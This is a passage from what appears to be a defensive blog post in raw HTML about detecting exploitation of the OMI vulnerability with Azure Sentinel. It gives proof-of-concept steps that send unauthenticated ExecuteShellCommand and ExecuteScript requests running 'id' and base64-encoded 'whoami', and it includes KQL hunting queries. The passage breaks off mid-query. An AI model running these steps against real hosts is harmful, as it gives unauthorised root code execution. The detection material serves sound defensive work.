data-contrast="none">ExecuteScript</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </UL> <P>&nbsp;</P> <H3 aria-level="2"><FONT size="5"><SPAN data-contrast="none">Run Public POC&nbsp;(ExecuteShellCommand)</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:40,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></H3> <OL> <LI><SPAN data-contrast="auto">SSH to machine A</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="%1." data-font="Calibri" data-listid="13" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><SPAN data-contrast="auto">SSH to machine B</SPAN></LI> <LI data-leveltext="%1." data-font="Calibri" data-listid="13" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><SPAN data-contrast="auto">On machine A, prepare the data that you want to send to machine B</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN> <OL> <LI data-leveltext="%1." data-font="Calibri" data-listid="13" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><SPAN data-contrast="auto">Request without authorization header</SPAN></LI> <LI data-leveltext="%1." data-font="Calibri" data-listid="13" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><SPAN data-contrast="auto">Set the command you want to execute. For this example we execute “</SPAN><STRONG><SPAN data-contrast="auto">id”.</SPAN></STRONG></LI> <LI data-leveltext="%1." data-font="Calibri" data-listid="13" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><SPAN data-contrast="auto">Use the&nbsp;ExecuteShellCommand&nbsp;method in data.</SPAN></LI> </OL> </LI> <LI data-leveltext="%1." data-font="Calibri" data-listid="13" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><SPAN data-contrast="auto">Send HTTP request</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </OL> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="execute_poc_executeshellcommand.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/311960i66DD4736803880E7/image-size/large?v=v2&amp;px=999" role="button" title="execute_poc_executeshellcommand.png" alt="execute_poc_executeshellcommand.png" /></span></P> <P>&nbsp;</P> <H3 aria-level="2"><FONT size="5"><SPAN data-contrast="none">Explore data in Azure Sentinel&nbsp;(ExecuteShellCommand)</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:40,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></H3> <P><SPAN data-contrast="auto">You can run the&nbsp;following hunting query to explore the execution context:</SPAN></P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <PRE><SPAN class="TextRun SCXW268281063 BCX8" data-contrast="auto"><SPAN class="NormalTextRun SCXW268281063 BCX8">Syslog</SPAN></SPAN><SPAN class="LineBreakBlob BlobObject DragDrop SCXW268281063 BCX8"><SPAN class="SCXW268281063 BCX8">&nbsp;</SPAN><BR class="SCXW268281063 BCX8" /></SPAN><SPAN class="TextRun SCXW268281063 BCX8" data-contrast="auto"><SPAN class="NormalTextRun SCXW268281063 BCX8">&nbsp; | parse<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW268281063 BCX8">SyslogMessage</SPAN><SPAN class="NormalTextRun SCXW268281063 BCX8"><SPAN>&nbsp;</SPAN>with "type="<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW268281063 BCX8">EventType</SPAN><SPAN class="NormalTextRun SCXW268281063 BCX8"><SPAN>&nbsp;</SPAN>"<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun ContextualSpellingAndGrammarErrorV2 SCXW268281063 BCX8">audit(</SPAN><SPAN class="NormalTextRun SCXW268281063 BCX8">" * "): "<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW268281063 BCX8">EventData</SPAN></SPAN><SPAN class="LineBreakBlob BlobObject DragDrop SCXW268281063 BCX8"><SPAN class="SCXW268281063 BCX8">&nbsp;</SPAN><BR class="SCXW268281063 BCX8" /></SPAN><SPAN class="TextRun SCXW268281063 BCX8" data-contrast="auto"><SPAN class="NormalTextRun SCXW268281063 BCX8">&nbsp; | where<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW268281063 BCX8">EventType</SPAN><SPAN class="NormalTextRun SCXW268281063 BCX8"><SPAN>&nbsp;</SPAN>=~ "AUOMS_EXECVE" and<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW268281063 BCX8">EventData</SPAN><SPAN class="NormalTextRun SCXW268281063 BCX8"><SPAN>&nbsp;</SPAN>has '/var/opt/</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW268281063 BCX8 DefaultHighlightTransition">microsoft</SPAN><SPAN class="NormalTextRun SCXW268281063 BCX8">/</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW268281063 BCX8">scx</SPAN><SPAN class="NormalTextRun SCXW268281063 BCX8">/</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW268281063 BCX8">tmp</SPAN><SPAN class="NormalTextRun SCXW268281063 BCX8">'</SPAN></SPAN><SPAN class="LineBreakBlob BlobObject DragDrop SCXW268281063 BCX8"><SPAN class="SCXW268281063 BCX8">&nbsp;</SPAN><BR class="SCXW268281063 BCX8" /></SPAN><SPAN class="TextRun SCXW268281063 BCX8" data-contrast="auto"><SPAN class="NormalTextRun SCXW268281063 BCX8">&nbsp; | project<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW268281063 BCX8 DefaultHighlightTransition">TimeGenerated</SPAN><SPAN class="NormalTextRun SCXW268281063 BCX8">,<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW268281063 BCX8">EventType</SPAN><SPAN class="NormalTextRun SCXW268281063 BCX8">, Computer,<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW268281063 BCX8">EventData</SPAN></SPAN><SPAN class="LineBreakBlob BlobObject DragDrop SCXW268281063 BCX8"><SPAN class="SCXW268281063 BCX8">&nbsp;</SPAN><BR class="SCXW268281063 BCX8" /></SPAN><SPAN class="TextRun SCXW268281063 BCX8" data-contrast="auto"><SPAN class="NormalTextRun SCXW268281063 BCX8">&nbsp; | parse<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW268281063 BCX8">EventData</SPAN><SPAN class="NormalTextRun SCXW268281063 BCX8"><SPAN>&nbsp;</SPAN>with * "</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW268281063 BCX8">syscall</SPAN><SPAN class="NormalTextRun SCXW268281063 BCX8">="<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW268281063 BCX8">syscall</SPAN><SPAN class="NormalTextRun SCXW268281063 BCX8"><SPAN>&nbsp;</SPAN>"<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW268281063 BCX8">syscall_r</SPAN><SPAN class="NormalTextRun SCXW268281063 BCX8">=" * " success=" success " exit=" exit " a0" *<BR />"<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW268281063 BCX8">ppid</SPAN><SPAN class="NormalTextRun SCXW268281063 BCX8">="<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW268281063 BCX8">ppid</SPAN><SPAN class="NormalTextRun SCXW268281063 BCX8"><SPAN>&nbsp;</SPAN>"<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW268281063 BCX8">pid</SPAN><SPAN class="NormalTextRun SCXW268281063 BCX8">="<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW268281063 BCX8">pid</SPAN><SPAN class="NormalTextRun SCXW268281063 BCX8"><SPAN>&nbsp;</SPAN>"<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW268281063 BCX8">audit_user</SPAN><SPAN class="NormalTextRun SCXW268281063 BCX8">="<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW268281063 BCX8">audit_user</SPAN><SPAN class="NormalTextRun SCXW268281063 BCX8"><SPAN>&nbsp;</SPAN>"<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW268281063 BCX8">auid</SPAN><SPAN class="NormalTextRun SCXW268281063 BCX8">="<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW268281063 BCX8">auid</SPAN><SPAN class="NormalTextRun SCXW268281063 BCX8"><SPAN>&nbsp;</SPAN>" user=" user "<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW268281063 BCX8">uid</SPAN><SPAN class="NormalTextRun SCXW268281063 BCX8">="<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW268281063 BCX8">uid</SPAN><SPAN class="NormalTextRun SCXW268281063 BCX8"><SPAN>&nbsp;</SPAN>" group=" group "<BR />gid=" gid "</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW268281063 BCX8">effective_user</SPAN><SPAN class="NormalTextRun SCXW268281063 BCX8">="<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW268281063 BCX8">effective_user</SPAN><SPAN class="NormalTextRun SCXW268281063 BCX8"><SPAN>&nbsp;</SPAN>"<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW268281063 BCX8">euid</SPAN><SPAN class="NormalTextRun SCXW268281063 BCX8">="<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW268281063 BCX8">euid</SPAN><SPAN class="NormalTextRun SCXW268281063 BCX8"><SPAN>&nbsp;</SPAN>"<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW268281063 BCX8">set_user</SPAN><SPAN class="NormalTextRun SCXW268281063 BCX8">="<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW268281063 BCX8">set_user</SPAN><SPAN class="NormalTextRun SCXW268281063 BCX8"><SPAN>&nbsp;</SPAN>" suid=" suid<BR />"<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW268281063 BCX8">filesystem_user</SPAN><SPAN class="NormalTextRun SCXW268281063 BCX8">="<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW268281063 BCX8">filesystem_user</SPAN><SPAN class="NormalTextRun SCXW268281063 BCX8"><SPAN>&nbsp;</SPAN>"<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW268281063 BCX8">fsuid</SPAN><SPAN class="NormalTextRun SCXW268281063 BCX8">="<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW268281063 BCX8">fsuid</SPAN><SPAN class="NormalTextRun SCXW268281063 BCX8"><SPAN>&nbsp;</SPAN>"<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW268281063 BCX8">effective_group</SPAN><SPAN class="NormalTextRun SCXW268281063 BCX8">="<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW268281063 BCX8">effective_group</SPAN><SPAN class="NormalTextRun SCXW268281063 BCX8"><SPAN>&nbsp;</SPAN>"<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW268281063 BCX8">egid</SPAN><SPAN class="NormalTextRun SCXW268281063 BCX8">="<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW268281063 BCX8">egid</SPAN><SPAN class="NormalTextRun SCXW268281063 BCX8"><SPAN>&nbsp;<BR /></SPAN>"<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW268281063 BCX8">set_group</SPAN><SPAN class="NormalTextRun SCXW268281063 BCX8">="<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW268281063 BCX8">set_group</SPAN><SPAN class="NormalTextRun SCXW268281063 BCX8"><SPAN>&nbsp;</SPAN>"<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW268281063 BCX8">sgid</SPAN><SPAN class="NormalTextRun SCXW268281063 BCX8">="<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW268281063 BCX8">sgid</SPAN><SPAN class="NormalTextRun SCXW268281063 BCX8"><SPAN>&nbsp;</SPAN>"<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW268281063 BCX8">filesystem_group</SPAN><SPAN class="NormalTextRun SCXW268281063 BCX8">="<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW268281063 BCX8">filesystem_group</SPAN><SPAN class="NormalTextRun SCXW268281063 BCX8"><SPAN>&nbsp;</SPAN>"<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW268281063 BCX8">fsgid</SPAN><SPAN class="NormalTextRun SCXW268281063 BCX8">="<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW268281063 BCX8">fsgid</SPAN><SPAN class="NormalTextRun SCXW268281063 BCX8"><SPAN>&nbsp;</SPAN>"<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW268281063 BCX8">tty</SPAN><SPAN class="NormalTextRun SCXW268281063 BCX8">="<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW268281063 BCX8">tty</SPAN><SPAN class="NormalTextRun SCXW268281063 BCX8"><SPAN>&nbsp;<BR /></SPAN>"<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW268281063 BCX8">ses</SPAN><SPAN class="NormalTextRun SCXW268281063 BCX8">="<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW268281063 BCX8">ses</SPAN><SPAN class="NormalTextRun SCXW268281063 BCX8"><SPAN>&nbsp;</SPAN>" comm=\"" comm "\" exe=\"" exe "\"" * "</SPAN><SPAN class="NormalTextRun SCXW268281063 BCX8">cwd</SPAN><SPAN class="NormalTextRun SCXW268281063 BCX8">=\""<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SCXW268281063 BCX8">cwd</SPAN><SPAN class="NormalTextRun SCXW268281063 BCX8"><SPAN>&nbsp;</SPAN>"\"" * "name=\"" name "\"" * "</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW268281063 BCX8">cmdline</SPAN><SPAN class="NormalTextRun SCXW268281063 BCX8">=\""<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW268281063 BCX8">cmdline</SPAN><SPAN class="NormalTextRun SCXW268281063 BCX8"><SPAN>&nbsp;</SPAN>"\"" *</SPAN></SPAN><SPAN class="LineBreakBlob BlobObject DragDrop SCXW268281063 BCX8"><SPAN class="SCXW268281063 BCX8">&nbsp;</SPAN><BR class="SCXW268281063 BCX8" /></SPAN><SPAN class="TextRun SCXW268281063 BCX8" data-contrast="auto"><SPAN class="NormalTextRun SCXW268281063 BCX8">&nbsp; | where<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW268281063 BCX8">uid</SPAN><SPAN class="NormalTextRun SCXW268281063 BCX8"><SPAN>&nbsp;</SPAN>== '0'</SPAN></SPAN><SPAN class="LineBreakBlob BlobObject DragDrop SCXW268281063 BCX8"><SPAN class="SCXW268281063 BCX8">&nbsp;</SPAN><BR class="SCXW268281063 BCX8" /></SPAN><SPAN class="TextRun SCXW268281063 BCX8" data-contrast="auto"><SPAN class="NormalTextRun SCXW268281063 BCX8">&nbsp; | where<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SCXW268281063 BCX8">cwd</SPAN><SPAN class="NormalTextRun SCXW268281063 BCX8"><SPAN>&nbsp;</SPAN>== '/var/opt/</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW268281063 BCX8">microsoft</SPAN><SPAN class="NormalTextRun SCXW268281063 BCX8">/</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW268281063 BCX8">scx</SPAN><SPAN class="NormalTextRun SCXW268281063 BCX8">/</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW268281063 BCX8">tmp</SPAN><SPAN class="NormalTextRun SCXW268281063 BCX8">'</SPAN></SPAN><SPAN class="LineBreakBlob BlobObject DragDrop SCXW268281063 BCX8"><SPAN class="SCXW268281063 BCX8">&nbsp;</SPAN><BR class="SCXW268281063 BCX8" /></SPAN><SPAN class="TextRun SCXW268281063 BCX8" data-contrast="auto"><SPAN class="NormalTextRun SCXW268281063 BCX8">&nbsp; | where comm ==<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW268281063 BCX8">'sh</SPAN><SPAN class="NormalTextRun SCXW268281063 BCX8">'</SPAN></SPAN><SPAN class="LineBreakBlob BlobObject DragDrop SCXW268281063 BCX8"><SPAN class="SCXW268281063 BCX8">&nbsp;</SPAN><BR class="SCXW268281063 BCX8" /></SPAN><SPAN class="TextRun SCXW268281063 BCX8" data-contrast="auto"><SPAN class="NormalTextRun SCXW268281063 BCX8">&nbsp; | extend Timestamp =<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW268281063 BCX8">TimeGenerated</SPAN><SPAN class="NormalTextRun SCXW268281063 BCX8">,<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW268281063 BCX8">HostCustomEntity</SPAN><SPAN class="NormalTextRun SCXW268281063 BCX8"><SPAN>&nbsp;</SPAN>= Computer,<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW268281063 BCX8">AccountCustomEntity</SPAN><SPAN class="NormalTextRun SCXW268281063 BCX8"><SPAN>&nbsp;</SPAN>= user</SPAN></SPAN><SPAN class="EOP SCXW268281063 BCX8" data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></PRE> <P>&nbsp;</P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="executeshellcommand_kql_query.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/311948i6E82A05388A19212/image-size/large?v=v2&amp;px=999" role="button" title="executeshellcommand_kql_query.png" alt="executeshellcommand_kql_query.png" /></span></SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">We observed that the execution was happening from the&nbsp;`</SPAN><STRONG><SPAN data-contrast="auto">current working directory (cwd): /var/opt/microsoft/scx/tmp`.&nbsp;</SPAN></STRONG><SPAN data-contrast="auto">This is an indicator that repeats across the other two methods to execute arbitrary&nbsp;code&nbsp;abusing the OMI vulnerability. Group the results by the command line values to identify initial outliers.</SPAN><SPAN><BR /></SPAN></P> <P>&nbsp;</P> <H3 aria-level="2"><FONT size="5"><SPAN data-contrast="none">Run Public POC&nbsp;(ExecuteScript)</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:40,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></H3> <OL> <LI><SPAN data-contrast="auto">SSH to machine A</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="%1." data-font="Calibri" data-listid="16" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><SPAN data-contrast="auto">SSH to machine B</SPAN></LI> <LI data-leveltext="%1." data-font="Calibri" data-listid="16" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><SPAN data-contrast="auto">On machine A, prepare the data that you want to send to machine B</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN> <OL> <LI data-leveltext="%1." data-font="Calibri" data-listid="16" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><SPAN data-contrast="auto">Request without authorization header</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="%1." data-font="Calibri" data-listid="16" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><SPAN data-contrast="auto">Set the script you want to execute:</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN> <OL> <LI data-leveltext="%1." data-font="Calibri" data-listid="16" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><SPAN data-contrast="auto">Pick a command. Let's say&nbsp;</SPAN><STRONG><SPAN data-contrast="auto">whoami</SPAN></STRONG><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="%1." data-font="Calibri" data-listid="16" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><SPAN data-contrast="auto">Base64 encode the command:&nbsp;</SPAN><STRONG><SPAN data-contrast="auto">d2hvYW1p</SPAN></STRONG><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </OL> </LI> <LI data-leveltext="%1." data-font="Calibri" data-listid="16" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><SPAN data-contrast="auto">Use the&nbsp;ExecuteScript method in data.</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </OL> </LI> <LI data-leveltext="%1." data-font="Calibri" data-listid="16" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><SPAN data-contrast="auto">Send HTTP request</SPAN></LI> </OL> <P>&nbsp;</P> <P><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="execute_poc_executescript.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/311958i543F243D2FF89FD5/image-size/large?v=v2&amp;px=999" role="button" title="execute_poc_executescript.png" alt="execute_poc_executescript.png" /></span></SPAN></P> <P>&nbsp;</P> <H3 aria-level="2"><FONT size="5"><SPAN data-contrast="none">Explore data in Azure Sentinel&nbsp;(ExecuteScript)</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:40,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></H3> <P><SPAN data-contrast="auto">You can run the previous hunting query again and explore the results. You will see that the&nbsp;</SPAN><STRONG><SPAN data-contrast="auto">current working directory (cwd)</SPAN></STRONG><SPAN data-contrast="auto">&nbsp;is the same, but the command line or&nbsp;in this case the&nbsp;script is now being hosted at the following directory:&nbsp;&nbsp;</SPAN><STRONG><SPAN data-contrast="auto">/etc/opt/microsoft/scx/conf/tmpdir/.&nbsp;</SPAN></STRONG><SPAN data-contrast="auto">&nbsp;The name of the scripts in that directory has the string “</SPAN><STRONG><SPAN data-contrast="auto">scx</SPAN></STRONG><SPAN data-contrast="auto">” as a prefix. For example:&nbsp;scx</SPAN><STRONG><SPAN data-contrast="auto">zEPOS4.</SPAN></STRONG><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <PRE><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"><SPAN class="TextRun SCXW267943799 BCX8" data-contrast="auto"><SPAN class="NormalTextRun SCXW267943799 BCX8">Syslog</SPAN></SPAN><SPAN class="LineBreakBlob BlobObject DragDrop SCXW267943799 BCX8"><SPAN class="SCXW267943799 BCX8">&nbsp;</SPAN><BR class="SCXW267943799 BCX8" /></SPAN><SPAN class="TextRun SCXW267943799 BCX8" data-contrast="auto"><SPAN class="NormalTextRun SCXW267943799 BCX8">&nbsp; | parse&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">SyslogMessage</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">&nbsp;with "type="&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">EventType</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">&nbsp;"&nbsp;</SPAN><SPAN class="NormalTextRun ContextualSpellingAndGrammarErrorV2 SCXW267943799 BCX8">audit(</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">" * "): "&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">EventData</SPAN></SPAN><SPAN class="LineBreakBlob BlobObject DragDrop SCXW267943799 BCX8"><SPAN class="SCXW267943799 BCX8">&nbsp;</SPAN><BR class="SCXW267943799 BCX8" /></SPAN><SPAN class="TextRun SCXW267943799 BCX8" data-contrast="auto"><SPAN class="NormalTextRun SCXW267943799 BCX8">&nbsp; | where&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">EventType</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">&nbsp;=~ "AUOMS_EXECVE" and&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">EventData</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">&nbsp;has '/var/opt/</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8 DefaultHighlightTransition">microsoft</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">/</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">scx</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">/</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">tmp</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">'</SPAN></SPAN><SPAN class="LineBreakBlob BlobObject DragDrop SCXW267943799 BCX8"><SPAN class="SCXW267943799 BCX8">&nbsp;</SPAN><BR class="SCXW267943799 BCX8" /></SPAN><SPAN class="TextRun SCXW267943799 BCX8" data-contrast="auto"><SPAN class="NormalTextRun SCXW267943799 BCX8">&nbsp; | project&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8 DefaultHighlightTransition">TimeGenerated</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">,&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">EventType</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">, Computer,&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">EventData</SPAN></SPAN><SPAN class="LineBreakBlob BlobObject DragDrop SCXW267943799 BCX8"><SPAN class="SCXW267943799 BCX8">&nbsp;</SPAN><BR class="SCXW267943799 BCX8" /></SPAN><SPAN class="TextRun SCXW267943799 BCX8" data-contrast="auto"><SPAN class="NormalTextRun SCXW267943799 BCX8">&nbsp; | parse&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">EventData</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">&nbsp;with * "</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">syscall</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">="&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">syscall</SPAN><SPAN class="NormalTextRun SCXW267943799 BCX8">&nbsp;"&nbsp;</SPAN><SPAN class="NormalTextRun SpellingErrorV2 SCXW267943799 BCX8">syscall_r</SPAN><SPAN class="NormalTextRun 